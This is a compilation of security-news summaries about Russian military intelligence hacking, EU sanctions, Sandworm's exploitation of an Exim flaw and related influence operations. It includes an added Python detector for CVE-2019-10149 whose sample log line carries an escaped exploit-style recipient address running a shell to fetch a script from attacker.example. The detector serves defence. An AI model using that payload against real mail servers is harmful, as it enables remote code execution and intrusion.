EU sanctions Russian intelligence, Chinese nationals and a North Korean front company for alleged hacks

The European Union has sanctioned six people and three organizations in Russia, China and North Korea in connection with three major cyberattacks dating back to 2017. EU officials announced Thursday they would enact restrictive measures against those they deemed responsible for the WannaCry ransomware outbreak in 2017, the NotPetya campaign and Operation Cloud Hopper, a Chinese cyber-espionage effort. Penalties include a travel ban and an asset freeze, and prohibit people and organizations in the EU from “making funds available” to the sanctioned individuals and entities. The move follows previous U.S. allegations against many of the same parties. “Sanctions are one of the options available in the EU’s cyber diplomacy toolbox to prevent, deter and respond to malicious cyber activities directed against the EU or its member states, and today is the first time the EU has used this tool,” officials said in a statement. The sanctions name unit 74455 of Russia’s […]

The post EU sanctions Russian intelligence, Chinese nationals and a North Korean front company for alleged hacks appeared first on CyberScoop.

NSA: Russia Hacking U.S. Firms, via Old Exim Flaw

The Russian state is breaking into companies, exploiting a vulnerability in an open-source email server.
The post NSA: Russia Hacking U.S. Firms, via Old Exim Flaw appeared first on Security Boulevard.

NSA calls out Russian military hackers targeting mail relay software

Hackers working for Russia’s military intelligence agency have been exploiting a vulnerability in mail relay software since August of last year, according to an alert issued Thursday by the National Security Agency. The NSA publicly attributes the activity to the Russian military’s Main Center for Special Technologies (GTsST). That group is more commonly known as Sandworm, the hacking group believed to be responsible for the Ukraine grid disruptions. The alert comes amid a broader agency effort to publicly share more unclassified threat intelligence. The NSA established a cybersecurity directorate last year to take the reins on providing real-time information in the hope of preventing digital intrusions against U.S. networks. The Exim Mail Transfer Agent (MTA) vulnerability exploited in this case, CVE-2019-10149, allows the threat actors to execute commands and code remotely. When Sandworm exploits the vulnerability, victim machines download and execute a shell script from a Sandworm-controlled domain, according to […]
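As an added example (not from the NSA alert or the CyberScoop article), the check below shows what a defender can verify from the facts above: CVE-2019-10149 affects Exim 4.87 through 4.91 and was fixed in 4.92, and the publicly known exploitation path smuggles an Exim string-expansion item such as `${run{...}}` into the local part of a recipient address so that `deliver_message()` expands and executes it. The code flags vulnerable version banners and scans SMTP/log lines for expansion operators that should never appear in an address. The log-line format and the addresses are constructed for the example and only approximate Exim's real main-log layout.

```python
import re

# Exim releases affected by CVE-2019-10149: 4.87 <= version < 4.92 (fixed in 4.92).
VULN_MIN = (4, 87)
FIXED = (4, 92)

# Exim string-expansion items that run code or touch local resources. A legitimate
# recipient address never contains one; the public CVE-2019-10149 exploit places
# ${run{...}} in the local part of a RCPT TO address.
EXPANSION_RE = re.compile(r"\$\{(run|readsocket|dlfunc|perl)\{")


def parse_exim_version(banner: str):
    """Return (major, minor) from a string like 'Exim version 4.91 #1 built ...',
    or None when no dotted version number is present."""
    m = re.search(r"\b(\d+)\.(\d+)\b", banner)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)))


def is_vulnerable_version(banner: str) -> bool:
    """True when the banner names an Exim release in the affected range."""
    v = parse_exim_version(banner)
    return v is not None and VULN_MIN <= v < FIXED


def find_expansion_injection(line: str):
    """Return the expansion operator name ('run', 'readsocket', ...) if the line
    carries an Exim expansion item, else None."""
    m = EXPANSION_RE.search(line)
    return m.group(1) if m else None


def scan(lines):
    """Scan SMTP transcript or Exim log lines; return (line_no, operator, line) hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        op = find_expansion_injection(line)
        if op:
            hits.append((n, op, line.strip()))
    return hits


# Constructed sample lines (not real traffic). Line 2 mimics the exploit: the
# local part is a ${run{...}} item with characters hex-escaped Exim-style, and
# the payload fetches a script from a hypothetical attacker host.
SAMPLE_LINES = [
    "2020-05-28 10:01:02 H=(mx.example.net) [198.51.100.7] rejected RCPT <alice@example.org>: relay not permitted",
    "2020-05-28 10:01:05 H=(mx.example.net) [198.51.100.7] RCPT TO:<${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x20http\\x3A\\x2F\\x2Fattacker.example\\x2Fx.sh\\x22}}@localhost>",
    "2020-05-28 10:01:09 H=(mx.example.net) [198.51.100.7] RCPT <bob+$ticket42@example.org>: accepted",
]

if __name__ == "__main__":
    print("vulnerable:", is_vulnerable_version("Exim version 4.91 #1 built 12-Jun-2018"))
    for n, op, line in scan(SAMPLE_LINES):
        print(f"line {n}: ${{{op}{{...}} expansion in address -> {line}")
```

Line 3 shows why the match is on the expansion syntax rather than on a bare `$`: a plus-addressed recipient containing a dollar sign is legitimate and must not fire. The version check is a triage aid only; patching to 4.92 or later, or confirming the distribution backported the fix, is the actual remediation.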

Russian hackers using stolen corporate email accounts to mask their phishing attempts

Hackers working for Russian military intelligence have long relied on zero-days and malware to target their victims, but in the last year they’ve kept it simple — using previously hacked email accounts to send a wide array of phishing attempts, according to new research from security firm Trend Micro. Since at least May of last year, the group known as Fancy Bear, APT28, or Pawn Storm, has used hacked email accounts belonging to high-profile personnel working at defense firms in the Middle East to carry out the operation, according to Feike Hacquebord, a senior threat researcher at Trend Micro. “The actor connects to a dedicated server using the OpenVPN option of a commercial VPN provider and then uses compromised email credentials to send out credential spam via a commercial email service provider,” Hacquebord writes in the research. The group, which the U.S. Department of Justice linked with Russia’s Main Intelligence Directorate […]

In rare move, State Department calls out Russia for attacks on Georgia last year

In a rare public announcement, the State Department is formally blaming Russian intelligence for a cyber incident that disrupted thousands of websites in Georgia last year. The incident, carried out by the Russian General Staff Main Intelligence Directorate (GRU) last October, according to Secretary of State Mike Pompeo, disrupted and defaced thousands of Georgian government websites and the broadcast of two television stations. “This action contradicts Russia’s attempts to claim it is a responsible actor in cyberspace and demonstrates a continuing pattern of reckless Russian GRU cyber operations against a number of countries,” Pompeo said in a statement Thursday. “These operations aim to sow division, create insecurity, and undermine democratic institutions.” Thursday’s announcement was the first time the U.S. government connected the GRU to the hacking group known as Sandworm. The U.S. government has previously said Sandworm was responsible for the NotPetya worm and Olympic Destroyer attacks. The rare reprimand […]

The latest in Facebook’s dragnet: Propaganda from Russian military intelligence

Facebook on Wednesday announced the removal of three networks of accounts it had determined were operating on behalf of foreign governments, including a number of pages that the company tied to Russian intelligence services. Researchers found a network of 78 accounts, 11 Pages, 29 groups and four Instagram pages that often posted about news such as Russia’s involvement in Syria and the downing of the Malaysian airliner MH17 and also had links to Russian military intelligence services, the company said. Sometimes, the account holders misrepresented themselves as citizen journalists, and contacted policymakers, reporters and other known figures in the region who could help amplify their content, Facebook said in a blog post. The other networks originated in Iran, where operators also impersonated journalists, and Vietnam and Myanmar, where the Burmese telecommunications company MyTel, which is indirectly owned by the Burmese and Vietnamese militaries, engaged in “coordinated inauthentic behavior.” These takedowns are […]

Americans still vulnerable to hack-and-leak tactics, DOJ official says

As the 2020 election campaigning kicks into high gear, a senior Department of Justice official says he worries that Americans are still vulnerable to foreign hack-and-leak operations that are intended to disrupt democratic processes. “One of the things that I am concerned about is the hacking-and-dumping activity that occurred in 2016,” John Demers, the assistant attorney general for national security, said Friday. He was referring to Russian military officers’ hacking of email servers used by Democratic political organizations, and the selective leaking of those emails to the public. Despite a lot of progress on election security since Russian interference in 2016, the personal email accounts used by political campaigns are still a weak link, Demers said at the Wilson Center in Washington, D.C. “It really is dependent on their cyber hygiene practices…and not clicking on that wrong email,” Demers said. “What the Russians did in 2016 in terms of the […]

Russia’s GRU propped up fake media personas, mostly failed at social media promotion after DNC hack

Russian military hackers who stole emails from the Democratic National Committee in 2016 were acting as only one part of a larger, coordinated effort to spread Kremlin-approved messaging before and after the 2016 election, according to new findings from Stanford University. Stanford’s Internet Observatory on Tuesday released a trove of analysis detailing how the GRU, a Russian military intelligence unit, was unable to generate public interest in the data stolen from Hillary Clinton’s campaign for more than a month. Hackers first linked to the stolen emails in a June 14, 2016 set of Facebook posts, pointing to a set of messages supposedly leaked from the campaign. Facebook engagement with the DC Leaks Page, later attributed to Russia, totaled a mere 834 engagements across 22 posts published over four months. International attention only began when WikiLeaks tweeted a link to a database containing thousands of documents revealing internal strife in the […]

A Russian military contractor has a new, shady Android malware kit

A contractor for the Russian military that was sanctioned for interfering in the 2016 U.S. election has developed Android malware that is being used in “highly-targeted” attacks that exfiltrate data from third-party applications, according to mobile security company Lookout. The malware allegedly developed by the contractor, St. Petersburg-based Special Technology Center (STC), is capable of installing the attacker’s own certificate in the device’s trusted certificate store and then using it for “man-in-the-middle” attacks, intercepting TLS-protected data before it reaches its intended recipient. “This ability is something that Lookout researchers have never seen in the wild before,” Lookout’s Adam Bauer, Apurva Kumar and Christoph Hebeisen said Wednesday. The so-called “Monokle” malware is extremely invasive, according to Lookout. It can record a target device’s screen while the user is unlocking it, capturing the user’s PIN. It abuses Android’s accessibility features to harvest data from third-party apps. And it uses “predictive-text dictionaries” to figure out what a […]
